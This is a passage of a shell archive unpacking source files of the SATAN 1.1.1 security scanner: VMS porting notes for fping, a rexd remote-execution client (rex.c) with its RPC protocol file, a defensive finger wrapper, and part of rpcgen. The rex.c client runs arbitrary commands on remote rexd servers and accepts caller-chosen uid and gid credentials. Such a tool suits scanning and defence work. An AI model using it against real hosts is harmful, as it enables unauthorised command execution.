X#endif
X
X3) VMS runs privileged programs in a different manner from UNIX. geteuid is
X"supported" by VAXC but the result is not really meaningful.
X
XThese lines are thus Unix specific:

X
X /* check if we are root */
X

X#ifndef VMS

X if (geteuid()) {
X fprintf(stderr,
X "This program can only be run by root, or it must be setuid root.\n");
X exit(3);
X }

X#endif
X
X4) VAXC does not support getopt. I got my copies of getopt, index and rindex
Xfrom a fileserver with bsd-sources, using anonymous FTP. These routines
Xcompiled without complaints and works fine under VAXC 3.2 at least.
X
X5) The VMS concept of exit codes is different from the Unix version. After some
Xthought I decided to short circuit the VAXC attempt of translating the Unix
Xreturn codes into VMS style return codes. My version of FPING always returns
X"exit(1)", which is VMS success. However the FPING status codes are put into a
XVMS symbol, FPING_STATUS. It is thus very easy to use the FPING return status
Xcodes for further action if needed.
X
XThe line at the end of main in FPING, "return 0;", must be changed to
X"exit(0);" for VMS, this should be OK for Unix too?
X
XA small routine is needed to handle the translation, it will probably not
Xget any rewards for nice C-code (I usually program in Fortran), and it was
Xlargely created by copying an example from the VAXC manuals:
X
X/* VMS-EXIT.C */
X#include <ssdef>
X#include <stdio>
X#include <descrip>
X
Xint LIB$SET_SYMBOL();
X
Xvms_exit (ecode)
Xint ecode;
X{
X int status = 1;
X static $DESCRIPTOR(fping_name, "FPING_STATUS");
X static $DESCRIPTOR(fping_exit_0,"0");
X static $DESCRIPTOR(fping_exit_1,"1");
X static $DESCRIPTOR(fping_exit_2,"2");
X static $DESCRIPTOR(fping_exit_3,"3");
X static $DESCRIPTOR(fping_exit_4,"4");
X static $DESCRIPTOR(fping_exit_5,"5");
X
X switch(ecode) {
X case 0 :
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_0);
X break;
X case 1 :
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_1);
X break;
X case 2 :
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_2);
X break;
X case 3 :
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_3);
X break;
X case 4 :
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_4);
X break;
X default:
X status = LIB$SET_SYMBOL(&fping_name,&fping_exit_5);
X break;
X }
X
X exit(1);
X
X}
X
X
X6) The following command file (script) was used to compile and link under VMS:
X
X$! VMS-CC-MAKE.COM
X$!
X$! This compile+link procedure has been tested with VAXC 3.2 and
X$! MultiNet 3.0H.
X$!
X$! NOTE: getopt, index, and rindex are not part of VAXC, however the BSD
X$! versions works fine. They should be available by anonymous FTP
X$! from a number of fileservers.
X$!
X$ define/user arpa multinet_root:[multinet.include.arpa]
X$ define/user netinet multinet_root:[multinet.include.netinet]
X$ define/user sys multinet_root:[multinet.include.sys],sys$library
X$ cc /nolist /define="exit=vms_exit" fping.c
X$ cc /nolist vms-exit.c
X$ cc /nolist getopt.c
X$ cc /nolist index.c
X$ cc /nolist rindex.c
X$ link /nomap/notrace fping,vms-exit,getopt,index,rindex,sys$input/opt
Xmultinet:multinet_socket_library/share
Xsys$share:vaxcrtl/share
X$ delete fping.obj.*,vms-exit.obj.*,getopt.obj.*,index.obj.*,rindex.obj.*
X$ purge fping.exe
X$ fping :== $'f$environment("default")'fping
X
X7) Piping files into fping is not available under VMS, but the "f" option does
Xthe same job.
X
X8) fping must be installed with privileges if it is to be used by
Xnon-privileged users under VMS.
X
XThe question then is, does it work? Well, as far I can see the answer is yes!
XHere are some examples of output:
X
X$ fping xxx
Xxxx address not found
X$ show symbol fping_status
X FPING_STATUS = "2"
X$ fping vxcrna.cern.ch
Xvxcrna.cern.ch is alive
X$ show symbol fping_status
X FPING_STATUS = "0"
X$ fping -de vxcrna.cern.ch
Xvxcrna.cern.ch is alive (320 msec)
X$ show symbol fping_status
X FPING_STATUS = "0"
X$ fping -v
Xvsfys5$dkb100:[scratch.iversen]fping.exe;7: $Revision: 1.17 $ $Date: 1992/07/23 03:29:42 $
Xvsfys5$dkb100:[scratch.iversen]fping.exe;7: comments to sche...@Stanford.EDU
X
XRegards, Per (ive...@vsfys1.fi.uib.no)
X
END_OF_FILE
if test 5510 -ne `wc -c <'satan-1.1.1/src/fping/README.VMS'`; then
echo shar: \"'satan-1.1.1/src/fping/README.VMS'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/README.VMS'
fi
if test -f 'satan-1.1.1/src/misc/rex.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/rex.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/rex.c'\" $6029 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/rex.c' <<'END_OF_FILE'
X /*
X * rex - simplified rexd client. Usage: rex [-a authinfo] server command...

X *
X * Author: Wietse Venema

X */
X
X/* System libraries. */
X
X#include <sys/types.h>
X#include <sys/socket.h>
X#include <sys/time.h>
X#include <stdio.h>
X#include <stdlib.h>
X#include <unistd.h>
X#include <netdb.h>
X#include <memory.h>
X#include <string.h>
X
X /*
X * Sun now wants us to #define PORTMAP or things fall apart.
X */
X#define PORTMAP
X#include <rpc/rpc.h>
X

Xextern int optind;
Xextern char *optarg;

X
X /*
X * Many <rpc/rex.h> versions depend on the historical sgttyb
X * terminal control structure. We must use our on version.
X */
X
X#include "rex.h"
X
X/* Local stuff. */
X
Xstatic char *progname;
Xstatic CLIENT *rex_server();
Xstatic AUTH *rex_auth();
Xstatic int rex_command();
Xstatic void rex_startup();
Xstatic void do_io();
Xstatic int rex_exit();
Xstatic int stream_port();
X
X/* Defaults. */
X
Xstatic struct timeval timeout = {10, 0};
X
Xstatic char *serv_env[] = {
X "PATH=/usr/ucb:/bin:/usr/bin",
X 0,
X};
X
Xstatic void usage()
X{
X printf("Usage: %s [-a authinfo] server command...\n", progname);
X exit(1);
X}
X
Xmain(argc, argv)
Xint argc;
Xchar **argv;
X{
X int c;
X CLIENT *client;
X int server_sock;
X char *auth = 0;

X
X progname = argv[0];
X

X while ((c = getopt(argc, argv, "a:")) != EOF) {
X switch (c) {
X case 'a':
X auth = optarg;
X break;
X default:
X usage();
X }
X }
X argc -= optind;
X argv += optind;
X if (argc < 2)
X usage();
X
X /* Establish rexd server, run command, and clean up. */
X
X client = rex_server(argv[0]);
X client->cl_auth = (auth == 0) ? authunix_create_default() : rex_auth(auth);
X server_sock = rex_command(client, argv[0], argv + 1);
X do_io(server_sock);
X return (rex_exit(client, server_sock));
X}
X
X/* rex_server - establish rexd server instance */
X
Xstatic CLIENT *rex_server(server_name)
Xchar *server_name;

X{
X struct hostent *hp;

X struct sockaddr_in server_addr;
X int sock = RPC_ANYSOCK;
X CLIENT *client;
X
X /* Find server's IP address. */
X
X if ((hp = gethostbyname(server_name)) == 0) {
X fprintf(stderr, "%s: host not found\n", server_name);
X exit(1);
X }
X /* XXX should iterate over all IP addresses. */
X
X server_addr.sin_family = AF_INET;
X memcpy((caddr_t) & server_addr.sin_addr, hp->h_addr, hp->h_length);
X server_addr.sin_port = 0;
X
X if ((client = clnttcp_create(&server_addr,
X REXPROG, REXVERS,
X &sock, 0, 0)) == 0) {
X fprintf(stderr, "%s: ", server_name);
X clnt_pcreateerror(server_name);
X fprintf(stderr, "\n");
X exit(1);
X }
X return (client);
X}
X
X/* rex_auth - handle explicit credentials */
X
Xstatic AUTH *rex_auth(auth)
Xchar *auth;
X{
X char host[BUFSIZ];
X int uid;
X AUTH_GID_T gid;
X
X if (sscanf(auth, "%[^,],%d,%d", host, &uid, &gid) != 3)
X usage();
X return (authunix_create(host, uid, gid, 1, &gid));
X}
X
X/* rex_command - open socket to remote command */
X
Xstatic int rex_command(client, server_name, command)
XCLIENT *client;
Xchar *server_name;
Xchar **command;
X{
X static rex_start rx_start;
X static rex_result rx_result;
X enum clnt_stat stat;
X int sock;
X int server_sock;
X char cwd_host[BUFSIZ];
X char **cpp;
X
X sscanf(server_name, "%[^.]", cwd_host); /* XXX for old servers */
X
X rx_start.rst_cmd.rst_cmd_val = command;
X for (cpp = command; *cpp; cpp++)
X /* void */ ;
X rx_start.rst_cmd.rst_cmd_len = cpp - command;
X rx_start.rst_host = cwd_host; /* cwd server */
X rx_start.rst_fsname = ""; /* cwd file system */
X rx_start.rst_dirwithin = ""; /* cwd offset */
X rx_start.rst_env.rst_env_val = serv_env;
X for (cpp = serv_env; *cpp; cpp++)
X /* void */ ;
X rx_start.rst_env.rst_env_len = cpp - serv_env;
X rx_start.rst_port0 = stream_port(&sock);
X rx_start.rst_port1 = rx_start.rst_port0;
X rx_start.rst_port2 = rx_start.rst_port1;
X rx_start.rst_flags = 0;
X
X if (stat = clnt_call(client, REXPROC_START,
X xdr_rex_start, (void *) &rx_start,
X xdr_rex_result, (void *) &rx_result,
X timeout)) {
X fprintf(stderr, "%s: ", progname);
X clnt_perrno(stat);
X fprintf(stderr, "\n");
X exit(1);
X }
X if (rx_result.rlt_stat) {
X fprintf(stderr, "%s: %s\n", progname, rx_result.rlt_message);
X exit(1);
X }
X if ((server_sock = accept(sock, (struct sockaddr *) 0, (int *) 0)) < 0) {
X perror("accept");
X exit(1);
X }
X close(sock);
X return (server_sock);
X}
X
X/* do_io - shuffle bits across the network */
X
Xstatic void do_io(sock)

Xint sock;
X{
X char buf[BUFSIZ];

X int count;
X
X shutdown(sock, 1); /* make server read EOF */
X while ((count = read(sock, buf, sizeof(buf))) > 0)
X write(1, buf, count);
X}
X
X/* rex_exit - terminate remote command and get its exit status */
X
Xstatic int rex_exit(client, server_sock)
XCLIENT *client;
Xint server_sock;
X{
X static struct rex_result rx_result;
X enum clnt_stat stat;
X
X close(server_sock);
X if (stat = clnt_call(client, REXPROC_WAIT,
X xdr_void, (void *) 0,
X xdr_rex_result, (void *) &rx_result,
X timeout)) {
X fprintf(stderr, "%s ", progname);
X clnt_perrno(stat);
X fprintf(stderr, "\n");
X exit(1);
X }
X return (rx_result.rlt_stat);
X}
X
X/* stream_port - create ready-to-accept socket and return port number */
X
Xstatic int stream_port(sockp)
Xint *sockp;

X{
X struct sockaddr_in sin;

X int sock;
X int len;
X
X /* Create socket. */
X
X if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
X perror("socket");
X exit(1);
X }
X /* Bind the socket to some random port. */
X

X memset((char *) &sin, 0, sizeof(sin));
X sin.sin_family = AF_INET;

X if (bind(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0) {
X perror("bind");
X exit(1);
X }
X /* Find out the socket's port number. */
X
X len = sizeof(sin);
X if (getsockname(sock, (struct sockaddr *) & sin, &len) < 0) {
X perror("getsockname");
X exit(1);
X }
X /* Make the socket ready to receive connections. */
X
X if (listen(sock, 1) < 0) {
X perror("listen");
X exit(1);
X }
X *sockp = sock;
X return (htons(sin.sin_port));
X}
END_OF_FILE
if test 6029 -ne `wc -c <'satan-1.1.1/src/misc/rex.c'`; then
echo shar: \"'satan-1.1.1/src/misc/rex.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/rex.c'
fi
if test -f 'satan-1.1.1/src/misc/rex.x' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/rex.x'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/rex.x'\" $7314 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/rex.x' <<'END_OF_FILE'

X/*
X * Remote execution (rex) protocol specification

X */
X
X#ifndef RPC_HDR
X%#ifndef lint

X%/*static char sccsid[] = "from: @(#)rex.x 1.3 87/09/18 Copyr 1987 Sun Micro";*/
X%/*static char sccsid[] = "from: @(#)rex.x 2.1 88/08/01 4.0 RPCSRC";*/
X%static char rcsid[] = "$Id: rex.x,v 1.1 1994/08/04 19:01:49 wollman Exp $";

X%#endif /* not lint */
X#endif
X

Xconst STRINGSIZE = 1024;
Xtypedef string rexstring<1024>;
X
X/*
X * values to pass to REXPROC_SIGNAL
X */
Xconst SIGINT = 2; /* interrupt */
X
X/*
X * Values for rst_flags, below
X */
Xconst REX_INTERACTIVE = 1; /* interactive mode */
X
Xstruct rex_start {
X rexstring rst_cmd<>; /* list of command and args */
X rexstring rst_host; /* working directory host name */
X rexstring rst_fsname; /* working directory file system name */
X rexstring rst_dirwithin;/* working directory within file system */
X rexstring rst_env<>; /* list of environment */
X unsigned int rst_port0; /* port for stdin */
X unsigned int rst_port1; /* port for stdout */
X unsigned int rst_port2; /* port for stderr */
X unsigned int rst_flags; /* options - see const above */
X};
X
Xstruct rex_result {
X int rlt_stat; /* integer status code */
X rexstring rlt_message; /* string message for human consumption */
X};
X
X
Xstruct sgttyb {
X unsigned four; /* always equals 4 */
X opaque chars[4];
X /* chars[0] == input speed */
X /* chars[1] == output speed */
X /* chars[2] == kill character */
X /* chars[3] == erase character */
X unsigned flags;
X};
X/* values for speeds above (baud rates) */
Xconst B0 = 0;
Xconst B50 = 1;
Xconst B75 = 2;
Xconst B110 = 3;
Xconst B134 = 4;
Xconst B150 = 5;
Xconst B200 = 6;
Xconst B300 = 7;
Xconst B600 = 8;
Xconst B1200 = 9;
Xconst B1800 = 10;
Xconst B2400 = 11;
Xconst B4800 = 12;
Xconst B9600 = 13;
Xconst B19200 = 14;
Xconst B38400 = 15;
X
X/* values for flags above */
Xconst TANDEM = 0x00000001; /* send stopc on out q full */
Xconst CBREAK = 0x00000002; /* half-cooked mode */
Xconst LCASE = 0x00000004; /* simulate lower case */
Xconst ECHO = 0x00000008; /* echo input */
Xconst CRMOD = 0x00000010; /* map \r to \r\n on output */
Xconst RAW = 0x00000020; /* no i/o processing */
Xconst ODDP = 0x00000040; /* get/send odd parity */
Xconst EVENP = 0x00000080; /* get/send even parity */
Xconst ANYP = 0x000000c0; /* get any parity/send none */
Xconst NLDELAY = 0x00000300; /* \n delay */
Xconst NL0 = 0x00000000;
Xconst NL1 = 0x00000100; /* tty 37 */
Xconst NL2 = 0x00000200; /* vt05 */
Xconst NL3 = 0x00000300;
Xconst TBDELAY = 0x00000c00; /* horizontal tab delay */
Xconst TAB0 = 0x00000000;
Xconst TAB1 = 0x00000400; /* tty 37 */
Xconst TAB2 = 0x00000800;
Xconst XTABS = 0x00000c00; /* expand tabs on output */
Xconst CRDELAY = 0x00003000; /* \r delay */
Xconst CR0 = 0x00000000;
Xconst CR1 = 0x00001000; /* tn 300 */
Xconst CR2 = 0x00002000; /* tty 37 */
Xconst CR3 = 0x00003000; /* concept 100 */
Xconst VTDELAY = 0x00004000; /* vertical tab delay */
Xconst FF0 = 0x00000000;
Xconst FF1 = 0x00004000; /* tty 37 */
Xconst BSDELAY = 0x00008000; /* \b delay */
Xconst BS0 = 0x00000000;
Xconst BS1 = 0x00008000;
Xconst CRTBS = 0x00010000; /* do backspacing for crt */
Xconst PRTERA = 0x00020000; /* \ ... / erase */
Xconst CRTERA = 0x00040000; /* " \b " to wipe out char */
Xconst TILDE = 0x00080000; /* hazeltine tilde kludge */
Xconst MDMBUF = 0x00100000; /* start/stop output on carrier intr */
Xconst LITOUT = 0x00200000; /* literal output */
Xconst TOSTOP = 0x00400000; /* SIGTTOU on background output */
Xconst FLUSHO = 0x00800000; /* flush output to terminal */
Xconst NOHANG = 0x01000000; /* no SIGHUP on carrier drop */
Xconst L001000 = 0x02000000;
Xconst CRTKIL = 0x04000000; /* kill line with " \b " */
Xconst PASS8 = 0x08000000;
Xconst CTLECH = 0x10000000; /* echo control chars as ^X */
Xconst PENDIN = 0x20000000; /* tp->t_rawq needs reread */
Xconst DECCTQ = 0x40000000; /* only ^Q starts after ^S */
Xconst NOFLSH = 0x80000000; /* no output flush on signal */
X
Xstruct tchars {
X unsigned six; /* always equals 6 */
X opaque chars[6];
X /* chars[0] == interrupt char */
X /* chars[1] == quit char */
X /* chars[2] == start output char */
X /* chars[3] == stop output char */
X /* chars[4] == end-of-file char */
X /* chars[5] == input delimeter (like nl) */
X};
X
Xstruct ltchars {
X unsigned six; /* always equals 6 */
X opaque chars[6];
X /* chars[0] == stop process signal */
X /* chars[1] == delayed stop process signal */
X /* chars[2] == reprint line */
X /* chars[3] == flush output */
X /* chars[4] == word erase */
X /* chars[5] == literal next character */
X unsigned mode;
X};
X
Xstruct rex_ttysize {
X int ts_lines;
X int ts_cols;
X};
X
Xstruct rex_ttymode {
X sgttyb basic; /* standard unix tty flags */
X tchars more; /* interrupt, kill characters, etc. */
X ltchars yetmore; /* special Berkeley characters */
X unsigned andmore; /* and Berkeley modes */
X};
X
X/* values for andmore above */
Xconst LCRTBS = 0x0001; /* do backspacing for crt */
Xconst LPRTERA = 0x0002; /* \ ... / erase */
Xconst LCRTERA = 0x0004; /* " \b " to wipe out char */
Xconst LTILDE = 0x0008; /* hazeltine tilde kludge */
Xconst LMDMBUF = 0x0010; /* start/stop output on carrier intr */
Xconst LLITOUT = 0x0020; /* literal output */
Xconst LTOSTOP = 0x0040; /* SIGTTOU on background output */
Xconst LFLUSHO = 0x0080; /* flush output to terminal */
Xconst LNOHANG = 0x0100; /* no SIGHUP on carrier drop */
Xconst LL001000 = 0x0200;
Xconst LCRTKIL = 0x0400; /* kill line with " \b " */
Xconst LPASS8 = 0x0800;
Xconst LCTLECH = 0x1000; /* echo control chars as ^X */
Xconst LPENDIN = 0x2000; /* needs reread */
Xconst LDECCTQ = 0x4000; /* only ^Q starts after ^S */
Xconst LNOFLSH = 0x8000; /* no output flush on signal */
X
Xprogram REXPROG {
X version REXVERS {
X
X /*
X * Start remote execution
X */
X rex_result
X REXPROC_START(rex_start) = 1;
X
X /*
X * Wait for remote execution to terminate
X */
X rex_result
X REXPROC_WAIT(void) = 2;
X
X /*
X * Send tty modes
X */
X void
X REXPROC_MODES(rex_ttymode) = 3;
X
X /*
X * Send window size change
X */
X void
X REXPROC_WINCH(rex_ttysize) = 4;
X
X /*
X * Send other signal
X */
X void
X REXPROC_SIGNAL(int) = 5;
X } = 1;
X} = 100017;
END_OF_FILE
if test 7314 -ne `wc -c <'satan-1.1.1/src/misc/rex.x'`; then
echo shar: \"'satan-1.1.1/src/misc/rex.x'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/rex.x'
fi
if test -f 'satan-1.1.1/src/misc/safe_finger.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/safe_finger.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/safe_finger.c'\" $5102 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/safe_finger.c' <<'END_OF_FILE'
X /*
X * safe_finger - finger client wrapper that protects against nasty stuff
X * from finger servers. Use this program for automatic reverse finger
X * probes, not the raw finger command.
X *
X * Build with: cc -o safe_finger safe_finger.c
X *
X * The problem: some programs may react to stuff in the first column. Other
X * programs may get upset by thrash anywhere on a line. File systems may
X * fill up as the finger server keeps sending data. Text editors may bomb
X * out on extremely long lines. The finger server may take forever because
X * it is somehow wedged. The code below takes care of all this badness.
X *
X * Author: Wietse Venema, Eindhoven University of Technology, The Netherlands.
X */
X
X#ifndef lint
Xstatic char sccsid[] = "@(#) safe_finger.c 1.4 94/12/28 17:42:41";
X#endif
X
X/* System libraries */
X
X#include <sys/types.h>
X#include <sys/stat.h>
X#include <signal.h>
X#include <stdio.h>
X#include <ctype.h>
X#include <pwd.h>
X
Xextern void exit();
X
X/* Local stuff */
X
Xchar path[] = "PATH=/bin:/usr/bin:/usr/ucb:/usr/bsd:/etc:/usr/etc:/usr/sbin";
X
X#define TIME_LIMIT 60 /* Do not keep listinging forever */
X#define INPUT_LENGTH 100000 /* Do not keep listinging forever */
X#define LINE_LENGTH 128 /* Editors can choke on long lines */
X#define FINGER_PROGRAM "finger" /* Most, if not all, UNIX systems */
X#define UNPRIV_NAME "nobody" /* Preferred privilege level */
X#define UNPRIV_UGID 32767 /* Default uid and gid */
X
Xint finger_pid;
X
Xvoid cleanup(sig)
Xint sig;
X{
X kill(finger_pid, SIGKILL);
X exit(0);

X}
X
Xmain(argc, argv)
Xint argc;

Xchar **argv;
X{
X int c;
X int line_length = 0;
X int finger_status;
X int wait_pid;
X int input_count = 0;
X struct passwd *pwd;
X
X /*
X * First of all, let's don't run with superuser privileges.
X */
X if (getuid() == 0 || geteuid() == 0) {
X if ((pwd = getpwnam(UNPRIV_NAME)) && pwd->pw_uid > 0) {
X setgid(pwd->pw_gid);
X setuid(pwd->pw_uid);
X } else {
X setgid(UNPRIV_UGID);
X setuid(UNPRIV_UGID);

X }
X }
X
X /*

X * Redirect our standard input through the raw finger command.
X */
X if (putenv(path)) {
X fprintf(stderr, "%s: putenv: out of memory", argv[0]);
X exit(1);
X }
X argv[0] = FINGER_PROGRAM;
X finger_pid = pipe_stdin(argv);
X
X /*
X * Don't wait forever (Peter Wemm <pe...@gecko.DIALix.oz.au>).
X */
X signal(SIGALRM, cleanup);
X (void) alarm(TIME_LIMIT);
X
X /*
X * Main filter loop.
X */
X while ((c = getchar()) != EOF) {
X if (input_count++ >= INPUT_LENGTH) { /* don't listen forever */
X fclose(stdin);
X printf("\n\n Input truncated to %d bytes...\n", input_count - 1);
X break;
X }
X if (c == '\n') { /* good: end of line */
X putchar(c);
X line_length = 0;
X } else {
X if (line_length >= LINE_LENGTH) { /* force end of line */
X printf("\\\n");
X line_length = 0;
X }
X if (line_length == 0) { /* protect left margin */
X putchar(' ');
X line_length++;
X }
X if (isascii(c) && (isprint(c) || isspace(c))) { /* text */
X if (c == '\\') {
X putchar(c);
X line_length++;
X }
X putchar(c);
X line_length++;
X } else { /* quote all other thash */
X printf("\\%03o", c & 0377);
X line_length += 4;
X }
X }
X }
X
X /*
X * Wait until the finger child process has terminated and account for its
X * exit status. Which will always be zero on most systems.
X */
X while ((wait_pid = wait(&finger_status)) != -1 && wait_pid != finger_pid)
X /* void */ ;
X return (wait_pid != finger_pid || finger_status != 0);
X}
X
X/* perror_exit - report system error text and terminate */
X
Xvoid perror_exit(text)

Xchar *text;
X{
X perror(text);
X exit(1);
X}
X

X/* pipe_stdin - pipe stdin through program (from my ANSI to OLD C converter) */
X
Xint pipe_stdin(argv)
Xchar **argv;
X{
X int pipefds[2];
X int pid;
X int i;
X struct stat st;
X
X /*
X * The code that sets up the pipe requires that file descriptors 0,1,2
X * are already open. All kinds of mysterious things will happen if that
X * is not the case. The following loops makes sure that descriptors 0,1,2
X * are set up properly.
X */
X
X for (i = 0; i < 3; i++) {
X if (fstat(i, &st) == -1 && open("/dev/null", 2) != i)
X perror_exit("open /dev/null");
X }
X
X /*
X * Set up the pipe that interposes the command into our standard input
X * stream.
X */
X
X if (pipe(pipefds))
X perror_exit("pipe");
X
X switch (pid = fork()) {
X case -1: /* error */
X perror_exit("fork");
X /* NOTREACHED */
X case 0: /* child */
X (void) close(pipefds[0]); /* close reading end */
X (void) close(1); /* connect stdout to pipe */
X if (dup(pipefds[1]) != 1)
X perror_exit("dup");
X (void) close(pipefds[1]); /* close redundant fd */
X (void) execvp(argv[0], argv);
X perror_exit(argv[0]);
X /* NOTREACHED */
X default: /* parent */
X (void) close(pipefds[1]); /* close writing end */
X (void) close(0); /* connect stdin to pipe */
X if (dup(pipefds[0]) != 0)
X perror_exit("dup");
X (void) close(pipefds[0]); /* close redundant fd */
X return (pid);
X }
X}
END_OF_FILE
if test 5102 -ne `wc -c <'satan-1.1.1/src/misc/safe_finger.c'`; then
echo shar: \"'satan-1.1.1/src/misc/safe_finger.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/safe_finger.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_svcout.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_svcout.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_svcout.c'\" $7408 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_svcout.c' <<'END_OF_FILE'
X/* @(#)rpc_svcout.c 2.1 88/08/01 4.0 RPCSRC */

Xstatic char sccsid[] = "@(#)rpc_svcout.c 1.6 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_svcout.c, Server-skeleton outputter for the RPC protocol compiler
X * Copyright (C) 1987, Sun Microsytsems, Inc.
X */
X#include <stdio.h>

X#include <stdlib.h>
X#include <unistd.h>
X#include <string.h>

X#include "rpc_parse.h"
X#include "rpc_util.h"
X

Xstatic char RQSTP[] = "rqstp";
Xstatic char TRANSP[] = "transp";
Xstatic char ARG[] = "argument";
Xstatic char RESULT[] = "result";
Xstatic char ROUTINE[] = "local";
X
Xstatic write_program();
Xstatic printerr();
Xstatic printif();
X
X/*
X * write most of the service, that is, everything but the registrations.
X */
Xvoid
Xwrite_most()

X{
X list *l;
X definition *def;

X version_list *vp;

X
X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;

X if (def->def_kind == DEF_PROGRAM) {
X for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) {
X f_print(fout, "\nstatic void ");
X pvname(def->def_name, vp->vers_num);
X f_print(fout, "();");
X }
X }
X }

X f_print(fout, "\n\n");

X f_print(fout, "main()\n");
X f_print(fout, "{\n");
X f_print(fout, "\tSVCXPRT *%s;\n", TRANSP);
X f_print(fout, "\n");

X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;
X if (def->def_kind != DEF_PROGRAM) {

X continue;
X }
X for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) {
X f_print(fout, "\t(void)pmap_unset(%s, %s);\n", def->def_name, vp->vers_name);

X }
X }
X}
X
X

X/*
X * write a registration for the given transport
X */
Xvoid
Xwrite_register(transp)
X char *transp;
X{

X list *l;
X definition *def;

X version_list *vp;
X
X f_print(fout, "\n");
X f_print(fout, "\t%s = svc%s_create(RPC_ANYSOCK", TRANSP, transp);
X if (streq(transp, "tcp")) {
X f_print(fout, ", 0, 0");
X }
X f_print(fout, ");\n");
X f_print(fout, "\tif (%s == NULL) {\n", TRANSP);
X f_print(fout, "\t\t(void)fprintf(stderr, \"cannot create %s service.\\n\");\n", transp);
X f_print(fout, "\t\texit(1);\n");
X f_print(fout, "\t}\n");

X
X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;
X if (def->def_kind != DEF_PROGRAM) {

X continue;
X }
X for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) {
X f_print(fout,
X "\tif (!svc_register(%s, %s, %s, ",
X TRANSP, def->def_name, vp->vers_name);
X pvname(def->def_name, vp->vers_num);
X f_print(fout, ", IPPROTO_%s)) {\n",
X streq(transp, "udp") ? "UDP" : "TCP");
X f_print(fout,
X "\t\t(void)fprintf(stderr, \"unable to register (%s, %s, %s).\\n\");\n",
X def->def_name, vp->vers_name, transp);
X f_print(fout, "\t\texit(1);\n");

X f_print(fout, "\t}\n");
X }
X }
X}
X
X

X/*
X * write the rest of the service
X */
Xvoid
Xwrite_rest()
X{
X f_print(fout, "\tsvc_run();\n");
X f_print(fout, "\t(void)fprintf(stderr, \"svc_run returned\\n\");\n");
X f_print(fout, "\texit(1);\n");

X f_print(fout, "}\n");
X}
X

Xvoid
Xwrite_programs(storage)
X char *storage;

X{
X list *l;
X definition *def;
X
X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;

X if (def->def_kind == DEF_PROGRAM) {
X write_program(def, storage);

X }
X }
X}
X
X
Xstatic

Xwrite_program(def, storage)
X definition *def;
X char *storage;
X{
X version_list *vp;
X proc_list *proc;
X int filled;
X
X for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) {
X f_print(fout, "\n");
X if (storage != NULL) {
X f_print(fout, "%s ", storage);
X }
X f_print(fout, "void\n");
X pvname(def->def_name, vp->vers_num);
X f_print(fout, "(%s, %s)\n", RQSTP, TRANSP);
X f_print(fout, " struct svc_req *%s;\n", RQSTP);
X f_print(fout, " SVCXPRT *%s;\n", TRANSP);

X f_print(fout, "{\n");
X

X filled = 0;

X f_print(fout, "\tunion {\n");

X for (proc = vp->procs; proc != NULL; proc = proc->next) {
X if (streq(proc->arg_type, "void")) {
X continue;
X }
X filled = 1;
X f_print(fout, "\t\t");
X ptype(proc->arg_prefix, proc->arg_type, 0);

X pvname(proc->proc_name, vp->vers_num);

X f_print(fout, "_arg;\n");
X }
X if (!filled) {
X f_print(fout, "\t\tint fill;\n");
X }
X f_print(fout, "\t} %s;\n", ARG);
X f_print(fout, "\tchar *%s;\n", RESULT);
X f_print(fout, "\tbool_t (*xdr_%s)(), (*xdr_%s)();\n", ARG, RESULT);
X f_print(fout, "\tchar *(*%s)();\n", ROUTINE);
X f_print(fout, "\n");
X f_print(fout, "\tswitch (%s->rq_proc) {\n", RQSTP);
X
X if (!nullproc(vp->procs)) {
X f_print(fout, "\tcase NULLPROC:\n");
X f_print(fout, "\t\t(void)svc_sendreply(%s, xdr_void, (char *)NULL);\n", TRANSP);
X f_print(fout, "\t\treturn;\n\n");
X }
X for (proc = vp->procs; proc != NULL; proc = proc->next) {
X f_print(fout, "\tcase %s:\n", proc->proc_name);
X f_print(fout, "\t\txdr_%s = xdr_%s;\n", ARG,
X stringfix(proc->arg_type));
X f_print(fout, "\t\txdr_%s = xdr_%s;\n", RESULT,
X stringfix(proc->res_type));
X f_print(fout, "\t\t%s = (char *(*)()) ", ROUTINE);

X pvname(proc->proc_name, vp->vers_num);

X f_print(fout, ";\n");
X f_print(fout, "\t\tbreak;\n\n");
X }

X f_print(fout, "\tdefault:\n");

X printerr("noproc", TRANSP);
X f_print(fout, "\t\treturn;\n");
X f_print(fout, "\t}\n");
X
X f_print(fout, "\tmemset((char *)&%s, 0, sizeof(%s));\n", ARG, ARG);
X printif("getargs", TRANSP, "&", ARG);
X printerr("decode", TRANSP);
X f_print(fout, "\t\treturn;\n");
X f_print(fout, "\t}\n");
X
X f_print(fout, "\t%s = (*%s)(&%s, %s);\n", RESULT, ROUTINE, ARG,
X RQSTP);
X f_print(fout,
